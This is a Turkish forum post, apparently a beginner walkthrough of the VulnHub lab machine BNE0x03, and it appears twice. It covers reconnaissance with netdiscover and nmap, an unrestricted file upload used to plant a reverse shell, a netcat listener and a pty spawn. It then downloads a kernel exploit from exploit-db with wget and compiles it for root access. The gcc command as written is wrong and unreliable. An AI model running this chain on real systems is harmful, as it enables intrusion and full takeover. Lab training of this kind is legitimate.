Can tarafından yazılmıştır.
Selamlar herkese, yeni başlayan dostlarımız için bir makine buldum. Bunun çözümünü sizinle paylaşmak istedim. Yeni başlayan dostlarımız için kolaydan zora makine çözümleri yapmayı planlıyorum. Dilerseniz makineyi VulnHub üzerinden yükleyip çözebilirsiniz.
İzleyeceğimiz adımlar;
Sistemi Tanıma,
Zaafiyeti bulma,
Sömürme ve yetki yükseltme olacaktır.
İlk adımımız Sistemi Tanıma
Sistemi Tanıma adımlarında şu adımları izleyebiliriz;
Ağ keşifi,port taraması, dizin keşfi.
Ağ keşifi yaparken Netdiscover aracını kullanıyoruz.
sudo netdiscover yazarak aracı kullanabiliriz.
Netdiscover
Yukarıda görüldüğü üzere makineye ait ip adresi yer alıyor. (Eğer ki sizde görünmüyorsa,ağ ayarlarını kontrol edin.)
Netdiscover aracından bulduğumuz IP adresini “nmap” isimli port tarama aracında kullanacağız.
Nmap Taraması
nmap -sS -sV ip_adresi yazarak nmap’i kullanıyoruz.
80 Portu açık. Yani bir web servisi ayakta.siteyi ziyaret ettiğimizde
login ve register olduğunu görüyoruz .Hesap açıp panele giriş yaptığımızda ise:
Kullanıcı paneli
şekilde bir görüntü ile karşlaşıyoruz.
Paneldeki fonksiyonlar basit. O sebepten çok fazla atak vektörü yok. Kullanıcıların profil fotoğrafı yükleyebildiği bir yer var.Bu fonksiyonda “Unrestricted File Upload” zaafiyeti var. Yani fotoğraf yüklememiz gerekiyorken biz oraya reverse shell yükleyeceğiz.
Reverse Shell
Kullandığımız reverse shelle buradan erişebilirsiniz. Evet şu anda reverse shellimiz başarıyla siteye yüklendi. Şimdi ise terminale gidip nc -lvp reverse_shelle_eklediğiniz_port_numarası yazmamız gerekmektedir. Bu sayede artık saldırgan portu dinlemeye almış olacak. Sağ tık “resmi yeni sayfada aç” diyerek yeni sekmede shellimizi açıyoruz.
Reverse Shell’e bağlanma
şimdi ise python -c ‘import pty; pty.spawn(“/bin/bash”)’ yazarak TTY shell’imize geçiyoruz
TTY shell
sürüm bilgisi
uname -a yazarak sistemin versiyon bilgilerine eriştik. Google’da bu sürümün (Privilege Escalation) yetki yükseltme exploitini arıyoruz.(buradan bulabilirsiniz)
exploit yükleme & derleme
Daha sonra ise tmp dizinine geçiyoruz.wget “https://www.exploit-db.com/exploits/37292” komutu ile exploitimizi yüklüyoruz. Yüklenen dosya ismini mv 37292 37292.c olarak değiştiriyoruz, ardından gcc ile kodumuzu derliyoruz.
gcc 37292.c 37292 yazarak kodumuzun derlenmiş halini 37292 olarak kaydediyoruz.şimdi ise ./37292 yazdığımız zaman root yetkilerine erişmiş olacağız.
root
Elimden geldiğince net anlatmaya çalıştım. Umarım anlaşılır olabilmişimdir. Herhangi bir sorunuz olursa twitter.com/pwnlabme adresinden ulaşabilirsiniz.
[TR] BNE0X03 -Simple Zafiyetli Makine Çözümü
Selamlar herkese, yeni başlayan dostlarımız için bir makine buldum. Bunun çözümünü sizinle paylaşmak istedim. Yeni başlayan dostlarımız için kolaydan zora makine çözümleri yapmayı planlıyorum. Dilerseniz makineyi VulnHub üzerinden yükleyip çözebilirsiniz.
İzleyeceğimiz adımlar;
Sistemi Tanıma,
Zaafiyeti bulma,
Sömürme ve yetki yükseltme olacaktır.
İlk adımımız Sistemi Tanıma
Sistemi Tanıma adımlarında şu adımları izleyebiliriz;
Ağ keşifi,port taraması, dizin keşfi.
Ağ keşifi yaparken Netdiscover aracını kullanıyoruz.
sudo netdiscover yazarak aracı kullanabiliriz.
Netdiscover
Yukarıda görüldüğü üzere makineye ait ip adresi yer alıyor. (Eğer ki sizde görünmüyorsa,ağ ayarlarını kontrol edin.)
Netdiscover aracından bulduğumuz IP adresini “nmap” isimli port tarama aracında kullanacağız.
Nmap Taraması
nmap -sS -sV ip_adresi yazarak nmap’i kullanıyoruz.
80 Portu açık. Yani bir web servisi ayakta.siteyi ziyaret ettiğimizde
login ve register olduğunu görüyoruz .Hesap açıp panele giriş yaptığımızda ise:
Kullanıcı paneli
şekilde bir görüntü ile karşlaşıyoruz.
2.adım: Sömürme
Paneldeki fonksiyonlar basit. O sebepten çok fazla atak vektörü yok. Kullanıcıların profil fotoğrafı yükleyebildiği bir yer var.Bu fonksiyonda “Unrestricted File Upload” zaafiyeti var. Yani fotoğraf yüklememiz gerekiyorken biz oraya reverse shell yükleyeceğiz.
Reverse Shell
Kullandığımız reverse shelle buradan erişebilirsiniz. Evet şu anda reverse shellimiz başarıyla siteye yüklendi. Şimdi ise terminale gidip nc -lvp reverse_shelle_eklediğiniz_port_numarası yazmamız gerekmektedir. Bu sayede artık saldırgan portu dinlemeye almış olacak. Sağ tık “resmi yeni sayfada aç” diyerek yeni sekmede shellimizi açıyoruz.
Reverse Shell’e bağlanma
şimdi ise python -c ‘import pty; pty.spawn(“/bin/bash”)’ yazarak TTY shell’imize geçiyoruz
TTY shell
3. adım: Yetki Yükseltme
sürüm bilgisi
uname -a yazarak sistemin versiyon bilgilerine eriştik. Google’da bu sürümün (Privilege Escalation) yetki yükseltme exploitini arıyoruz.(buradan bulabilirsiniz)
exploit yükleme & derleme
Daha sonra ise tmp dizinine geçiyoruz.wget “https://www.exploit-db.com/exploits/37292” komutu ile exploitimizi yüklüyoruz. Yüklenen dosya ismini mv 37292 37292.c olarak değiştiriyoruz, ardından gcc ile kodumuzu derliyoruz.
gcc 37292.c 37292 yazarak kodumuzun derlenmiş halini 37292 olarak kaydediyoruz.şimdi ise ./37292 yazdığımız zaman root yetkilerine erişmiş olacağız.
root
Elimden geldiğince net anlatmaya çalıştım. Umarım anlaşılır olabilmişimdir. Herhangi bir sorunuz olursa twitter.com/pwnlabme adresinden ulaşabilirsiniz.
Moderatör tarafında düzenlendi: